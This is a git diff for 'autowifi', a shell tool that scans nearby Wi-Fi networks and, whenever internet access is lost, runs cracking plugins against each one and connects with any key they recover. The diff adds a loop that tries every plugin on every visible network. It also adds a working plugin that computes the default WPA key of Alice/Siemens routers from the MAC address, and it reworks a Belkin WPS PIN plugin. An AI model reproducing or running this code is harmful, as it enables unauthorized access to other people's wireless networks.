diff options
-rwxr-xr-x | usr/bin/autowifi | 19 | ||||
-rwxr-xr-x | usr/bin/autowifi_dryrun | 40 | ||||
-rw-r--r-- | usr/lib/autowifi/lib/plugin_core | 26 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/02alice | 20 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 9 |
5 files changed, 78 insertions, 36 deletions
diff --git a/usr/bin/autowifi b/usr/bin/autowifi index 1969e650..5de46f41 100755 --- a/usr/bin/autowifi +++ b/usr/bin/autowifi @@ -114,6 +114,21 @@ loop_over_cracks(){ done return 1 } +loop_cracks_over_networks(){ + wifi_init + for crack in $(find $crackdir -type f | sort -u); do + for i in `seq 1 $WIFI_COUNT`; do + KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" + if [ $? -eq 0 ]; then + eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" + if [ $? -eq 0 ]; then + return 0 + fi + fi + done + done + +} #scan_all(){ # for i in `seq 1 $WIFI_COUNT`; do @@ -151,11 +166,11 @@ elif [ -n "$1" ]; then connect_to_network_by_ssid "$1" else echo looping network now - check_internet || loop_over_networks + check_internet || loop_cracks_over_networks while sleep 60; do if ! check_internet; then - loop_over_networks + loop_cracks_over_networks fi done fi diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 1df94119..8860b4a6 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -2,30 +2,23 @@ # ENV: # the root directory (e.g. root=$PWD/../../ if run from here ) cd $(dirname $(readlink -f $0)) -root=${root:-/} -wifi=${wifi:-wlan0} - test "${1:-}" = 'quiet' && exec 2>&- -# for iwlist_scan -. $root/usr/lib/autowifi/lib/iwlist +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log -# . $ROOT/usr/lib/autowifi/lib/ +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core -# for check_internet and check_gateway -# . /usr/lib/autowifi/lib/network +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi + #SSID MAC CHANNEL ENCRYPTION + ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do printf "%s" "Trying $(basename $hack) against $1 : " >&2 @@ -41,13 +34,18 @@ crack_wifi(){ done return $ALL_RET } +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} loop_over_networks(){ - . /tmp/${wifi}.scan + wifi_init + echo "SSID:MAC:CHANNEL:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} done } -iwlist_scan > /tmp/${wifi}.scan loop_over_networks diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core index da003350..1b83b0c3 100644 --- a/usr/lib/autowifi/lib/plugin_core +++ b/usr/lib/autowifi/lib/plugin_core @@ -1,24 +1,38 @@ +#!/bin/sh parse_plugin_args(){ [ $# -ne 4 ] && plugin_usage && exit 1 # convenience function to put args in ENV variables ESSID="$1" - MAC="$2" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} CHANNEL="$3" ENC="$4" - if [ ${#MAC} -ne 17 ] ;then + if [ ${#MAC} -ne 12 ] ;then echo "MAC malformed" exit 1 fi } plugin_usage(){ cat << EOF -usage: $0 ESSID MAC CHANNEL ENC WPA WPA2" +usage: $0 ESSID MAC CHANNEL ENC" ESSID - string MAC - 00:11:22:33:44:55 - ENC - on | off - WPA - 0 | 1 - WPA2 - 0 | 1 + CHANNEL - 4 + ENC - wpa EOF } + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} |